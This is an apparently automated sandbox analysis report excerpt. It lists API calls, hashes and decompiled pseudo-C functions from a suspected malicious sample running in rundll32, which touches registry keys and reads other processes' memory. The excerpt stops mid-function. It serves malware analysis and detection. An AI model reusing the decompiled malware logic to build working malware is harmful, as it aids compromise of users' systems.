                                                          • Opcode ID: b9fac8abdeb095f3921738e65a27dfc1f8f125708d91ae6ac873788b0a2f34db
                                                          • Instruction ID: 5ed82165c81d60ec7e47431fbaf430edb058e3be668097fd643dc8f1b7883224
                                                          • Opcode Fuzzy Hash: b9fac8abdeb095f3921738e65a27dfc1f8f125708d91ae6ac873788b0a2f34db
                                                          • Instruction Fuzzy Hash: F9112AB1900218EFDB10DFA5D885BDD7BF8AB08396F448826ED05F7291D7B495088BA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 05585EA9: RtlAllocateHeap.NTDLL(00000000,?,05586423), ref: 05585EB5
                                                          • GetProcessImageFileNameW.PSAPI(?,00000000,00000800,00001000,0559C140,00000000,0557CC8B,?,0557CD20,?), ref: 05583B09
                                                          • PathFindFileNameW.SHLWAPI(00000000,?,?,00000000,00000800,00001000,0559C140,00000000,0557CC8B,?,0557CD20,?), ref: 05583B14
                                                          • _wcsupr.NTDLL ref: 05583B21
                                                          • lstrlenW.KERNEL32(00000000), ref: 05583B29
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: FileName$AllocateFindHeapImagePathProcess_wcsuprlstrlen
                                                          • String ID:
                                                          • API String ID: 2533608484-0
                                                          • Opcode ID: c408d2b6122d52c70c43ce99941ca3a6676baa26105f7b0856219dab44fceefd
                                                          • Instruction ID: bf707d8eea015857916d3314153cd0956710f123c746e8db1444132e7db4cb8f
                                                          • Opcode Fuzzy Hash: c408d2b6122d52c70c43ce99941ca3a6676baa26105f7b0856219dab44fceefd
                                                          • Instruction Fuzzy Hash: 24F0E9313151126F9B127B756CCDD7F9A5DFFD1E66B16082AF501E2040DF18CC0955A4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 05573600
                                                            • Part of subcall function 0557852A: RtlEnterCriticalSection.NTDLL(00000000), ref: 05578536
                                                            • Part of subcall function 0557852A: CloseHandle.KERNEL32(?), ref: 05578544
                                                            • Part of subcall function 0557852A: RtlLeaveCriticalSection.NTDLL(00000000), ref: 05578560
                                                          • CloseHandle.KERNEL32(?), ref: 0557360E
                                                          • InterlockedDecrement.KERNEL32(0559BFFC), ref: 0557361D
                                                            • Part of subcall function 0558BCA0: SetEvent.KERNEL32(000002DC,05573638), ref: 0558BCAA
                                                            • Part of subcall function 0558BCA0: CloseHandle.KERNEL32(000002DC), ref: 0558BCBF
                                                            • Part of subcall function 0558BCA0: HeapDestroy.KERNELBASE(055C0000), ref: 0558BCCF
                                                          • RtlExitUserThread.NTDLL(00000000), ref: 05573639
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: CloseHandle$CriticalSection$DecrementDestroyEnterEventExitHeapInterlockedLeaveMultipleObjectsThreadUserWait
                                                          • String ID:
                                                          • API String ID: 1141245775-0
                                                          • Opcode ID: 11b9e4542c0c21af2be1ecb5f13b401bce38236d1d9cb251ae4c2d6693dd6192
                                                          • Instruction ID: 24d0c2b5cc96f89a8b90b726b3077aec3d7eaa5821d7a3986104d89b44f00513
                                                          • Opcode Fuzzy Hash: 11b9e4542c0c21af2be1ecb5f13b401bce38236d1d9cb251ae4c2d6693dd6192
                                                          • Instruction Fuzzy Hash: 22F0C270611204ABCB055B699C4AF793B78FB45770F120209F422972C0EF789D0AABA8
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,69B25F44), ref: 055729BA
                                                          • HeapFree.KERNEL32(00000000,00000000,00000000,00000000), ref: 05572A1B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Time$FileFreeHeapSystem
                                                          • String ID: g*+%
                                                          • API String ID: 892271797-2400975550
                                                          • Opcode ID: 1e2de480749721571e2ff28b1c37ff9a3e896b54f36ca4d1268ff6c72359b7bb
                                                          • Instruction ID: d1dad7be0edc930d5ee305d7ec5720e0027c75757c0c42c5b389d5b091d37a8b
                                                          • Opcode Fuzzy Hash: 1e2de480749721571e2ff28b1c37ff9a3e896b54f36ca4d1268ff6c72359b7bb
                                                          • Instruction Fuzzy Hash: 4B11FE7591010DEBDF11EBD4E945A9EB7BCFB08301F510593A501E2140DB78AA88AB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • memset.NTDLL ref: 0558979C
                                                          • memcpy.NTDLL ref: 055897C4
                                                            • Part of subcall function 0558A71C: NtAllocateVirtualMemory.NTDLL(05585620,00000000,00000000,05585620,00003000,00000040), ref: 0558A74D
                                                            • Part of subcall function 0558A71C: RtlNtStatusToDosError.NTDLL(00000000), ref: 0558A754
                                                            • Part of subcall function 0558A71C: SetLastError.KERNEL32(00000000), ref: 0558A75B
                                                          • GetLastError.KERNEL32(00000010,00000218,05594EAD,00000100,?,00000318,00000008), ref: 055897DB
                                                          • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,05594EAD,00000100), ref: 055898BE
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Error$Last$AllocateMemoryStatusVirtualmemcpymemset
                                                          • String ID:
                                                          • API String ID: 685050087-0
                                                          • Opcode ID: 3972ec4e79cadfb520d039c8a4c19ef7c27eca7cb3d48e801a111bb4ac800657
                                                          • Instruction ID: 256dd55711c4cdf2234efa5cad14ccfbce23b577ac3db158543f357362475757
                                                          • Opcode Fuzzy Hash: 3972ec4e79cadfb520d039c8a4c19ef7c27eca7cb3d48e801a111bb4ac800657
                                                          • Instruction Fuzzy Hash: 6D413EB1604702AFDB60EF64D845FBABBF9BB88310F00892DF599D6250E730D5158BA2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 88%
                                                          			E00E55448(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
                                                          				signed int _v8;
                                                          				char _v12;
                                                          				signed int* _v16;
                                                          				char _v284;
                                                          				void* __esi;
                                                          				char* _t59;
                                                          				intOrPtr* _t60;
                                                          				void* _t62;
                                                          				intOrPtr _t64;
                                                          				short* _t65;
                                                          				void* _t67;
                                                          				intOrPtr _t68;
                                                          				intOrPtr _t69;
                                                          				intOrPtr _t71;
                                                          				void* _t73;
                                                          				signed int _t81;
                                                          				int _t91;
                                                          				void* _t92;
                                                          				char _t98;
                                                          				signed int* _t100;
                                                          				intOrPtr* _t101;
                                                          				void* _t102;
                                                          
                                                          				_t92 = __ecx;
                                                          				_v8 = _v8 & 0x00000000;
                                                          				_t98 = _a16;
                                                          				if(_t98 == 0) {
                                                          					__imp__( &_v284,  *0xe5a38c);
                                                          					_t91 = 0x80000002;
                                                          					L6:
                                                          					_t59 = E00E53FC1( &_v284,  &_v284);
                                                          					_a8 = _t59;
                                                          					if(_t59 == 0) {
                                                          						_v8 = 8;
                                                          						L29:
                                                          						_t60 = _a20;
                                                          						if(_t60 != 0) {
                                                          							 *_t60 =  *_t60 + 1;
                                                          						}
                                                          						return _v8;
                                                          					}
                                                          					_t101 = _a24;
                                                          					_t62 = E00E569FD(_t92, _t97, _t101, _t91, _t59); // executed
                                                          					if(_t62 != 0) {
                                                          						L27:
                                                          						E00E513CC(_a8);
                                                          						goto L29;
                                                          					}
                                                          					_t64 =  *0xe5a2cc; // 0x51b9cd0
                                                          					_t16 = _t64 + 0xc; // 0x51b9dc4
                                                          					_t65 = E00E53FC1(_t64,  *_t16);
                                                          					_a24 = _t65;
                                                          					if(_t65 == 0) {
                                                          						L14:
                                                          						_t29 = _t101 + 0x14; // 0x102
                                                          						_t33 = _t101 + 0x10; // 0x3d00e590, executed
                                                          						_t67 = E00E51E65(_t97,  *_t33, _t91, _a8,  *0xe5a384,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))); // executed
                                                          						if(_t67 == 0) {
                                                          							_t68 =  *0xe5a2d4; // 0x435d5a8
                                                          							if(_t98 == 0) {
                                                          								_t35 = _t68 + 0xe5b9ef; // 0x4d4c4b48
                                                          								_t69 = _t35;
                                                          							} else {
                                                          								_t34 = _t68 + 0xe5b907; // 0x55434b48
                                                          								_t69 = _t34;
                                                          							}
                                                          							if(E00E56414(_t69,  *0xe5a384,  *0xe5a388,  &_a24,  &_a16) == 0) {
                                                          								if(_t98 == 0) {
                                                          									_t71 =  *0xe5a2d4; // 0x435d5a8
                                                          									_t44 = _t71 + 0xe5b892; // 0x74666f53
                                                          									_t73 = E00E53FC1(_t44, _t44);
                                                          									_t99 = _t73;
                                                          									if(_t73 == 0) {
                                                          										_v8 = 8;
                                                          									} else {
                                                          										_t47 = _t101 + 0x10; // 0x3d00e590
                                                          										E00E5304F( *_t47, _t91, _a8,  *0xe5a388, _a24);
                                                          										_t49 = _t101 + 0x10; // 0x3d00e590
                                                          										E00E5304F( *_t49, _t91, _t99,  *0xe5a380, _a16);
                                                          										E00E513CC(_t99);
                                                          									}
                                                          								} else {
                                                          									_t40 = _t101 + 0x10; // 0x3d00e590, executed
                                                          									E00E5304F( *_t40, _t91, _a8,  *0xe5a388, _a24); // executed
                                                          									_t43 = _t101 + 0x10; // 0x3d00e590
                                                          									E00E5304F( *_t43, _t91, _a8,  *0xe5a380, _a16);
                                                          								}
                                                          								if( *_t101 != 0) {
                                                          									E00E513CC(_a24);
                                                          								} else {
                                                          									 *_t101 = _a16;
                                                          								}
                                                          							}
                                                          						}
                                                          						goto L27;
                                                          					}
                                                          					_t21 = _t101 + 0x10; // 0x3d00e590, executed
                                                          					_t81 = E00E53B91( *_t21, _t91, _a8, _t65,  &_v16,  &_v12); // executed
                                                          					if(_t81 == 0) {
                                                          						_t100 = _v16;
                                                          						if(_v12 == 0x28) {
                                                          							 *_t100 =  *_t100 & _t81;
                                                          							_t26 = _t101 + 0x10; // 0x3d00e590
                                                          							E00E51E65(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
                                                          						}
                                                          						E00E513CC(_t100);
                                                          						_t98 = _a16;
                                                          					}
                                                          					E00E513CC(_a24);
                                                          					goto L14;
                                                          				}
                                                          				if(_t98 <= 8 || _t98 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
                                                          					goto L29;
                                                          				} else {
                                                          					_t97 = _a8;
                                                          					E00E577FF(_t98, _a8,  &_v284);
                                                          					__imp__(_t102 + _t98 - 0x117,  *0xe5a38c);
                                                          					 *((char*)(_t102 + _t98 - 0x118)) = 0x5c;
                                                          					_t91 = 0x80000003;
                                                          					goto L6;
                                                          				}
                                                          			}

                                                          APIs
                                                          • StrChrA.SHLWAPI(00E5755B,0000005F,00000000,00000000,00000104), ref: 00E5547B
                                                          • lstrcpy.KERNEL32(?,?), ref: 00E554A8
                                                            • Part of subcall function 00E53FC1: lstrlen.KERNEL32(?,00000000,051B9CD0,74ECC740,00E535B6,051B9ED5,?,KE,?,KE,?,69B25F44,E8FA7DD7,00000000), ref: 00E53FC8
                                                            • Part of subcall function 00E53FC1: mbstowcs.NTDLL ref: 00E53FF1
                                                            • Part of subcall function 00E53FC1: memset.NTDLL ref: 00E54003
                                                            • Part of subcall function 00E5304F: lstrlenW.KERNEL32(?,?,?,00E55611,3D00E590,80000002,00E5755B,00E53E52,74666F53,4D4C4B48,00E53E52,?,3D00E590,80000002,00E5755B,?), ref: 00E53074
                                                            • Part of subcall function 00E513CC: RtlFreeHeap.NTDLL(00000000,00000000,00E520F3,00000000,00000000,?,00000000,?,?,?,?,?,00E568A9,00000000,?,00000001), ref: 00E513D8
                                                          • lstrcpy.KERNEL32(?,00000000), ref: 00E554CA
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                          • Associated: 00000015.00000002.738720079.0000000000E50000.00000004.00020000.sdmp
                                                          • Associated: 00000015.00000002.738826659.0000000000E59000.00000002.00020000.sdmp
                                                          • Associated: 00000015.00000002.738873414.0000000000E5A000.00000004.00020000.sdmp
                                                          • Associated: 00000015.00000002.738891661.0000000000E5C000.00000002.00020000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_e50000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
                                                          • String ID:
                                                          • API String ID: 3924217599-0
                                                          • Opcode ID: 9709e3a108964d7e99bfdb07ac7d4e020b037b6c9340e0f17bda0253aa54c673
                                                          • Instruction ID: 088338672251235097089b8cb993645cc2c0061bea85110f49422c26f995696b
                                                          • Opcode Fuzzy Hash: 9709e3a108964d7e99bfdb07ac7d4e020b037b6c9340e0f17bda0253aa54c673
                                                          • Instruction Fuzzy Hash: B1515A7210060AAFCF119F60DC51EAE3BB9EF0434AF509D64FE15B2161D735DA29EB11
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E00E55335(void* __edx) {
                                                          				void* _v8;
                                                          				int _v12;
                                                          				WCHAR* _v16;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				void* _t23;
                                                          				intOrPtr _t24;
                                                          				void* _t26;
                                                          				intOrPtr _t32;
                                                          				intOrPtr _t35;
                                                          				intOrPtr _t38;
                                                          				intOrPtr _t42;
                                                          				void* _t45;
                                                          				void* _t50;
                                                          				void* _t52;
                                                          
                                                          				_t50 = __edx;
                                                          				_v12 = 0;
                                                          				_t23 = E00E5249F(0,  &_v8); // executed
                                                          				if(_t23 != 0) {
                                                          					_v8 = 0;
                                                          				}
                                                          				_t24 =  *0xe5a2d4; // 0x435d5a8
                                                          				_t4 = _t24 + 0xe5bd70; // 0x51b9318
                                                          				_t5 = _t24 + 0xe5bd18; // 0x4f0053
                                                          				_t26 = E00E511B0( &_v16, _v8, _t5, _t4); // executed
                                                          				_t45 = _t26;
                                                          				if(_t45 == 0) {
                                                          					StrToIntExW(_v16, 0,  &_v12);
                                                          					_t45 = 8;
                                                          					if(_v12 < _t45) {
                                                          						_t45 = 1;
                                                          						__eflags = 1;
                                                          					} else {
                                                          						_t32 =  *0xe5a2d4; // 0x435d5a8
                                                          						_t11 = _t32 + 0xe5bd64; // 0x51b930c
                                                          						_t48 = _t11;
                                                          						_t12 = _t32 + 0xe5bd18; // 0x4f0053
                                                          						_t52 = E00E51370(_t11, _t12, _t11);
                                                          						_t59 = _t52;
                                                          						if(_t52 != 0) {
                                                          							_t35 =  *0xe5a2d4; // 0x435d5a8
                                                          							_t13 = _t35 + 0xe5bdae; // 0x30314549
                                                          							if(E00E5609A(_t48, _t50, _t59, _v8, _t52, _t13, 0x14) == 0) {
                                                          								_t61 =  *0xe5a2b4 - 6;
                                                          								if( *0xe5a2b4 <= 6) {
                                                          									_t42 =  *0xe5a2d4; // 0x435d5a8
                                                          									_t15 = _t42 + 0xe5bbba; // 0x52384549
                                                          									E00E5609A(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
                                                          								}
                                                          							}
                                                          							_t38 =  *0xe5a2d4; // 0x435d5a8
                                                          							_t17 = _t38 + 0xe5bda8; // 0x51b9350
                                                          							_t18 = _t38 + 0xe5bd80; // 0x680043
                                                          							_t45 = E00E5304F(_v8, 0x80000001, _t52, _t18, _t17);
                                                          							HeapFree( *0xe5a290, 0, _t52);
                                                          						}
                                                          					}
                                                          					HeapFree( *0xe5a290, 0, _v16);
                                                          				}
                                                          				_t54 = _v8;
                                                          				if(_v8 != 0) {
                                                          					E00E5243E(_t54);
                                                          				}
                                                          				return _t45;
                                                          			}

                                                          APIs
                                                          • StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,051B9318,00000000,?,7519F710,00000000,7519F730), ref: 00E55384
                                                          • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,051B9350,?,00000000,30314549,00000014,004F0053,051B930C), ref: 00E55421
                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,00E55131), ref: 00E55433
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                          • Associated: 00000015.00000002.738720079.0000000000E50000.00000004.00020000.sdmp
                                                          • Associated: 00000015.00000002.738826659.0000000000E59000.00000002.00020000.sdmp
                                                          • Associated: 00000015.00000002.738873414.0000000000E5A000.00000004.00020000.sdmp
                                                          • Associated: 00000015.00000002.738891661.0000000000E5C000.00000002.00020000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_e50000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: FreeHeap
                                                          • String ID:
                                                          • API String ID: 3298025750-0
                                                          • Opcode ID: b451b96513b3f283c72ac5f22fc57f5014989aa722859785f028f47065197943
                                                          • Instruction ID: 258f5597f4dc2240e0d32ade2953967e5c08728039453dd60ba30d9d6de635aa
                                                          • Opcode Fuzzy Hash: b451b96513b3f283c72ac5f22fc57f5014989aa722859785f028f47065197943
                                                          • Instruction Fuzzy Hash: BB31CF32A00218BFCB21DBA1DD85EAE3BFCEB44706F1419A6FA04BB061D7715A4CDB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 055783D0: RegCreateKeyA.ADVAPI32(80000001,059BA7F0,059BB184), ref: 055783E5
                                                            • Part of subcall function 055783D0: lstrlen.KERNEL32(059BA7F0,00000000,00000000,0559B072,?,?,?,05581876,00000001,00000000,059BB184), ref: 0557840E
                                                          • RegQueryValueExA.KERNEL32(00000000,74ECC740,00000000,?,0559B06C,05581A7A,00000001,00000000,059BB184,0559B072,00000000,?,05591CC9,059BB184,74ECC740,00000000), ref: 05581897
                                                          • RegSetValueExA.KERNEL32(00000000,74ECC740,00000000,00000003,0559B06C,00000028,?,05591CC9,059BB184,74ECC740,00000000,05581A7A), ref: 055818D6
                                                          • RegCloseKey.ADVAPI32(00000000,?,05591CC9,059BB184,74ECC740,00000000,05581A7A), ref: 055818E2
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Value$CloseCreateQuerylstrlen
                                                          • String ID:
                                                          • API String ID: 2552977122-0
                                                          • Opcode ID: f18280523c569badd751aad6665c400280529d1f94e5d7ca630d1ed1e3ed92c7
                                                          • Instruction ID: 89b08a03adf8b645151d6c8ede8cdbbcd3ca5ae39d2a5fa203f0d3679576b5b4
                                                          • Opcode Fuzzy Hash: f18280523c569badd751aad6665c400280529d1f94e5d7ca630d1ed1e3ed92c7
                                                          • Instruction Fuzzy Hash: EB316931D10219EFEB21AF95E8859AEBFB9FB04720F01422BF510A2150DB346E46DF60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 0558FA1F: lstrlen.KERNEL32(?,00000000,0558A13A,00000027,0559C1A8,?,00000000,?,?,0558A13A,?,00000001,?,05579E67,00000000,?), ref: 0558FA55
                                                            • Part of subcall function 0558FA1F: lstrcpy.KERNEL32(00000000,00000000), ref: 0558FA79
                                                            • Part of subcall function 0558FA1F: lstrcat.KERNEL32(00000000,00000000), ref: 0558FA81
                                                          • RegOpenKeyExA.KERNEL32(0558F863,00000000,00000000,00020119,80000001,00000000,?,00000000,7519F560,00000000,?,0558F863,80000001), ref: 0559260E
                                                          • RegOpenKeyExA.ADVAPI32(0558F863,0558F863,00000000,00020019,80000001,?,0558F863,80000001), ref: 05592624
                                                          • RegCloseKey.ADVAPI32(80000001,?,0558F863,80000001), ref: 0559266D
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Open$Closelstrcatlstrcpylstrlen
                                                          • String ID:
                                                          • API String ID: 4131162436-0
                                                          • Opcode ID: c7ac5cd86b05cefd5dd15c530462b649b0e7bde7f85b83369ca89afa33b49dc3
                                                          • Instruction ID: caa189f5b2fba6381d0dad28d5d9de58de6d0fbe02608d02ddd409ae2fc2b259
                                                          • Opcode Fuzzy Hash: c7ac5cd86b05cefd5dd15c530462b649b0e7bde7f85b83369ca89afa33b49dc3
                                                          • Instruction Fuzzy Hash: 1D213B76A00249BFDF01DF95DC81CAEBBBDFB48254F04406AF501A2510EB74AE54EB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 79%
                                                          			E00E515AB(void* __eax, char* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16, void** _a20, intOrPtr* _a24) {
                                                          				char _v5;
                                                          				signed int _v12;
                                                          				intOrPtr _v16;
                                                          				char _t28;
                                                          				void* _t33;
                                                          				void* _t38;
                                                          				void* _t45;
                                                          				char* _t46;
                                                          				void* _t48;
                                                          				char* _t56;
                                                          				char* _t57;
                                                          				intOrPtr _t59;
                                                          				void* _t60;
                                                          
                                                          				_t56 = _a4;
                                                          				_t60 = __eax;
                                                          				_v12 = 0xb;
                                                          				if(_t56 != 0 && __eax != 0) {
                                                          					_t5 = _t60 - 1; // -1
                                                          					_t46 =  &(_t56[_t5]);
                                                          					_t28 =  *_t46;
                                                          					_v5 = _t28;
                                                          					 *_t46 = 0;
                                                          					__imp__(_a8, _t45);
                                                          					_v16 = _t28;
                                                          					_t57 = StrStrA(_t56, _a8);
                                                          					if(_t57 != 0) {
                                                          						 *_t46 = _v5;
                                                          						_t33 = RtlAllocateHeap( *0xe5a290, 0, _a16 + _t60); // executed
                                                          						_t48 = _t33;
                                                          						if(_t48 == 0) {
                                                          							_v12 = 8;
                                                          						} else {
                                                          							_t58 = _t57 - _a4;
                                                          							E00E577FF(_t57 - _a4, _a4, _t48);
                                                          							_t38 = E00E577FF(_a16, _a12, _t58 + _t48);
                                                          							_t53 = _v16;
                                                          							_t59 = _a16;
                                                          							E00E577FF(_t60 - _t58 - _v16, _t53 + _t58 + _a4, _t38 + _t59);
                                                          							 *_a20 = _t48;
                                                          							_v12 = _v12 & 0x00000000;
                                                          							 *_a24 = _t60 - _v16 + _t59;
                                                          						}
                                                          					}
                                                          				}
                                                          				return _v12;
                                                          			}
                                                          APIs
                                                          • lstrlen.KERNEL32(7519F710,?,00000000,?,7519F710), ref: 00E515DF
                                                          • StrStrA.SHLWAPI(00000000,?), ref: 00E515EC
                                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 00E5160B
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                          • Associated: 00000015.00000002.738720079.0000000000E50000.00000004.00020000.sdmp
                                                          • Associated: 00000015.00000002.738826659.0000000000E59000.00000002.00020000.sdmp
                                                          • Associated: 00000015.00000002.738873414.0000000000E5A000.00000004.00020000.sdmp
                                                          • Associated: 00000015.00000002.738891661.0000000000E5C000.00000002.00020000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_e50000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: AllocateHeaplstrlen
                                                          • String ID:
                                                          • API String ID: 556738718-0
                                                          • Opcode ID: c8f07aa065cac2fcf5905397826c3751ab954de769803c236b05aa53d91b00e2
                                                          • Instruction ID: f86c8951903eb67d746afc5508f8457c21f6167338cad8e73a9a42bba92c27f7
                                                          • Opcode Fuzzy Hash: c8f07aa065cac2fcf5905397826c3751ab954de769803c236b05aa53d91b00e2
                                                          • Instruction Fuzzy Hash: 95218E75600249AFCB01DF6DD884B9EBFB5EF84346F088555EC04AB315C770D919CBA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 0558ED7B: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 0558EDB4
                                                            • Part of subcall function 0558ED7B: VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,?,?), ref: 0558EDEA
                                                            • Part of subcall function 0558ED7B: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 0558EDF6
                                                            • Part of subcall function 0558ED7B: lstrcmpi.KERNEL32(?,00000000), ref: 0558EE33
                                                            • Part of subcall function 0558ED7B: StrChrA.SHLWAPI(?,0000002E), ref: 0558EE3C
                                                            • Part of subcall function 0558ED7B: lstrcmpi.KERNEL32(?,00000000), ref: 0558EE4E
                                                            • Part of subcall function 0558ED7B: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0558EE9F
                                                          • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,00000010,?,?,?,055985A0,0000002C,05585C21,059B8E6E,?,00000000,055897A9), ref: 0557C27B
                                                            • Part of subcall function 05580E3E: GetProcAddress.KERNEL32(?,00000000), ref: 05580E67
                                                            • Part of subcall function 05580E3E: NtWow64ReadVirtualMemory64.NTDLL(00000100,?,?,00000028,00000000,00000000,00000100,00000000,?,?,?,0559081D,00000000,00000000,00000028,00000100), ref: 05580E89
                                                          • VirtualFree.KERNELBASE(?,00000000,00008000,00000010,?,?,?,055985A0,0000002C,05585C21,059B8E6E,?,00000000,055897A9,?,00000318), ref: 0557C306
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Virtual$AllocFree$lstrcmpi$AddressMemory64ProcReadWow64
                                                          • String ID: u
                                                          • API String ID: 4138075514-4067256894
                                                          • Opcode ID: 25f96799afef7fb9925901fb07dc9825cae215338358dcda2c8e1fffeb2023d0
                                                          • Instruction ID: edefd7d1480eb93a38ad57d3767b2dcaac8fa25cd585023be33b2528f15ac518
                                                          • Opcode Fuzzy Hash: 25f96799afef7fb9925901fb07dc9825cae215338358dcda2c8e1fffeb2023d0
                                                          • Instruction Fuzzy Hash: D6210F71E0122DABCF119FE5EC84ADEBBB5FF09720F10812AE914B6250C3344A45DFA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 055783D0: RegCreateKeyA.ADVAPI32(80000001,059BA7F0,059BB184), ref: 055783E5
                                                            • Part of subcall function 055783D0: lstrlen.KERNEL32(059BA7F0,00000000,00000000,0559B072,?,?,?,05581876,00000001,00000000,059BB184), ref: 0557840E
                                                          • RegQueryValueExA.KERNEL32(?,?,00000000,?,?,?,00000001,?), ref: 055752E0
                                                          • RegSetValueExA.ADVAPI32(?,?,00000000,00000003,?,00000010), ref: 05575312
                                                          • RegCloseKey.ADVAPI32(?), ref: 05575334
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Value$CloseCreateQuerylstrlen
                                                          • String ID:
                                                          • API String ID: 2552977122-0
                                                          • Opcode ID: 6a92aaa01841359934fe4b941be75ac348208d29b3c96f962a6ef4724717029e
                                                          • Instruction ID: e74b3380119ed171d2708003a13168822c89288c0905fa13397b63374f9cc27f
                                                          • Opcode Fuzzy Hash: 6a92aaa01841359934fe4b941be75ac348208d29b3c96f962a6ef4724717029e
                                                          • Instruction Fuzzy Hash: F7111971A1021DEFDF10DBA5EC49FEEBBB9FB44710F014066E500A7190EB746A459B60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E00E56793(void* __ecx, void* __eflags) {
                                                          				char _v8;
                                                          				void* _v12;
                                                          				int _v16;
                                                          				int _v20;
                                                          				intOrPtr _t15;
                                                          				intOrPtr _t19;
                                                          				long _t24;
                                                          				long _t29;
                                                          				short* _t31;
                                                          				short* _t34;
                                                          
                                                          				_t15 =  *0xe5a2d4; // 0x435d5a8
                                                          				_v8 = _v8 & 0x00000000;
                                                          				_t3 = _t15 + 0xe5ba40; // 0x4f0053
                                                          				_v16 = 4;
                                                          				_t31 = E00E57206(__ecx, _t3);
                                                          				if(_t31 != 0) {
                                                          					_t19 =  *0xe5a2d4; // 0x435d5a8
                                                          					_t5 = _t19 + 0xe5ba9c; // 0x6e0049
                                                          					_t34 = E00E57206(__ecx, _t5);
                                                          					if(_t34 != 0) {
                                                          						_t24 = RegOpenKeyExW(0x80000002, _t31, 0, 0x20119,  &_v12); // executed
                                                          						if(_t24 == 0) {
